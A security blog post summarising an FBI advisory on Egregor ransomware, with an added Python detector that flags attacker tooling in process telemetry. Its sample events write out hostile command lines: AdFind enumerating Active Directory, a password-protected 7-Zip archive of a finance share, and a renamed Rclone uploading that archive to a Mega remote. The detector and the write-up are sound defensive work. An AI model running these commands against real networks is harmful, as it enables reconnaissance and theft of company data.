FBI Releases Advisory Warning Companies Against the Dangers of the Egregor Ransomware


Saturday, January 9th, 2021

The FBI has released an advisory warning companies about the growing threat of the Egregor ransomware. The FBI assesses that Egregor operates under a Ransomware-as-a-Service (RaaS) model, meaning that “multiple different individuals play a part in conducting a single intrusion and ransomware event.” Because of this, the tactics, techniques, and procedures (TTPs) seen in an Egregor attack can vary widely from one intrusion to the next, which creates significant challenges for defense and mitigation.

Egregor's operators use multiple attack vectors to compromise a business's network, including targeting both business accounts and employees' personal accounts that share access with business networks or devices. Phishing emails carrying malicious attachments are one route to an initial foothold on the targeted network. According to the FBI, once inside, the operators use common penetration testing and exploitation tools such as Cobalt Strike, Qakbot/Qbot (a commodity banking trojan repurposed as a loader), Advanced IP Scanner, and AdFind to escalate privileges and move laterally across the network, and then use 7zip to archive data and Rclone to exfiltrate it. A practical caveat: these binaries are frequently renamed (Rclone has been observed masquerading as svchost), so detections that key only on file names will miss them; command-line syntax is the more reliable signal.
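As an added illustration (not part of the FBI advisory or this post), the following Python sketch runs detection logic for the tooling named above over process-creation telemetry of the kind Sysmon Event ID 1 or an EDR would emit. The rules key on command-line syntax rather than file names, so a renamed Rclone is still caught, and a small correlation step flags hosts where archiving was followed by an Rclone upload. The `ProcEvent` field names, the sample events, and the regular expressions are all assumptions made for this example; the events are constructed, not real telemetry.

```python
"""Detection sketch (added example) for post-compromise tooling named in the
FBI's Egregor advisory: AdFind, Advanced IP Scanner, 7-Zip for staging and
Rclone for exfiltration. Input is a list of process-creation events in
chronological order. All events below are constructed for illustration."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:           # field names are an assumption of this example
    host: str
    user: str
    image: str             # full path of the executable that started
    cmdline: str           # full command line as logged
    parent: str            # parent process image path


# AdFind run with an LDAP filter (-f) or a search scope (-sc): AD enumeration.
ADFIND_RE = re.compile(r"\badfind(?:\.exe)?\b.*(?:\s-f\s|\s-sc\s|objectcategory)")
# 7-Zip "a" (add) with a password (-p) and/or split volumes (-v): staging for exfil.
SEVENZIP_RE = re.compile(r"\b7za?(?:\.exe)?\s+a\s.*(?:\s-p\S+|\s-v\d+[kmg]?\b)")
# Rclone verb, a local source, then a named remote ("mega:", "s3:"...). Drive
# letters are one character, so {2,} keeps the Windows "copy" command out.
RCLONE_VERB_RE = re.compile(r"\b(?:copy|sync|move|copyto|moveto)\s+\S+\s+[a-z0-9_-]{2,}:\S*")
RCLONE_FLAG_RE = re.compile(r"\brclone\b|--transfers|--ignore-existing|--no-check-certificate|--config\b")


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def match_rules(ev: ProcEvent) -> list[str]:
    """Return the names of the rules a single event trips (possibly none)."""
    cmd = ev.cmdline.lower()
    image = _basename(ev.image)
    hits = []
    if ADFIND_RE.search(cmd):
        hits.append("adfind_enum")
    if "advanced_ip_scanner" in image or "advanced_ip_scanner" in cmd:
        hits.append("ip_scanner")
    if SEVENZIP_RE.search(cmd):
        hits.append("7zip_staging")
    if RCLONE_VERB_RE.search(cmd) and RCLONE_FLAG_RE.search(cmd):
        # Rclone syntax under a different file name is called out separately.
        hits.append("rclone_exfil" if "rclone" in image else "rclone_exfil_renamed")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[str, ProcEvent]]:
    """Run every rule over every event; one tuple per (rule, event) hit."""
    return [(rule, ev) for ev in events for rule in match_rules(ev)]


def exfil_chains(findings: list[tuple[str, ProcEvent]]) -> list[str]:
    """Hosts on which an archive was built and an Rclone upload followed,
    i.e. the stage-then-exfiltrate pattern. Assumes chronological input."""
    chains, staged = [], set()
    for rule, ev in findings:
        if rule == "7zip_staging":
            staged.add(ev.host)
        elif rule.startswith("rclone_exfil") and ev.host in staged:
            chains.append(ev.host)
    return chains


SAMPLE_EVENTS = [  # constructed sample telemetry, oldest first
    ProcEvent("fs01", "CORP\\svc_backup", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs", r"C:\Windows\System32\services.exe"),
    ProcEvent("ws22", "CORP\\jsmith", r"C:\Users\jsmith\AppData\Local\Temp\adfind.exe",
              'adfind.exe -f "(objectcategory=computer)" -csv > comps.csv',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("ws22", "CORP\\jsmith", r"C:\Users\jsmith\Downloads\advanced_ip_scanner.exe",
              "advanced_ip_scanner.exe /portable /r:10.0.0.0-10.0.255.255",
              r"C:\Windows\explorer.exe"),
    ProcEvent("fs01", "CORP\\jsmith", r"C:\Program Files\7-Zip\7z.exe",
              r'7z.exe a -pS3cret! -v500m C:\temp\out\finance.7z "D:\Shares\Finance"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("fs01", "CORP\\jsmith", r"C:\ProgramData\svchost.exe",   # renamed rclone
              r"svchost.exe copy C:\temp\out mega:backup --transfers 32 -q --ignore-existing",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("fs01", "CORP\\svc_backup", r"C:\Program Files\7-Zip\7z.exe",   # benign extract
              r"7z.exe x C:\updates\patch.7z -oC:\updates",
              r"C:\Program Files\Backup\agent.exe"),
]

if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for rule, ev in found:
        print(f"{rule:22s} host={ev.host} user={ev.user} image={ev.image}")
    print("stage-then-exfil chains:", exfil_chains(found))
```

The benign 7-Zip extraction by the backup agent is left alone, while the password-protected, volume-split archive of a file share followed by a masqueraded Rclone upload from the same host produces both individual hits and a correlated chain. In production the remote-name list, flag list and the per-host time window would be tuned to the environment.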

The FBI strongly urges companies affected by Egregor not to pay the ransom, as paying may embolden the criminals to mount further attacks and may fund other illicit activity. Paying also does not guarantee recovery: in some cases, victims who paid Egregor's operators did not get their files back. If you or your organization has been affected by the Egregor ransomware, the FBI urges you to report the incident to your local FBI field office.

The FBI lists the following mitigation techniques to protect yourself and your company:

  • Back up critical data offline
  • Ensure copies of critical data are kept in the cloud or on an external hard drive or storage device
  • Secure your backups and ensure the data cannot be modified or deleted from the system where the data resides
  • Install and regularly update anti-virus or anti-malware software on all hosts
  • Only use secure networks and avoid using public Wi-Fi networks
  • Use two-factor authentication (2FA) and do not click on unsolicited attachments or links in emails

Egregor was first observed in September 2020 and had compromised more than 150 victims worldwide by the time of the advisory. If victims refuse to pay, the operators threaten to publish the stolen data on publicly accessible forums and chat rooms, the double-extortion tactic that makes offline backups alone an incomplete defense. Egregor is also known for printing its ransom note on printers attached to compromised machines.
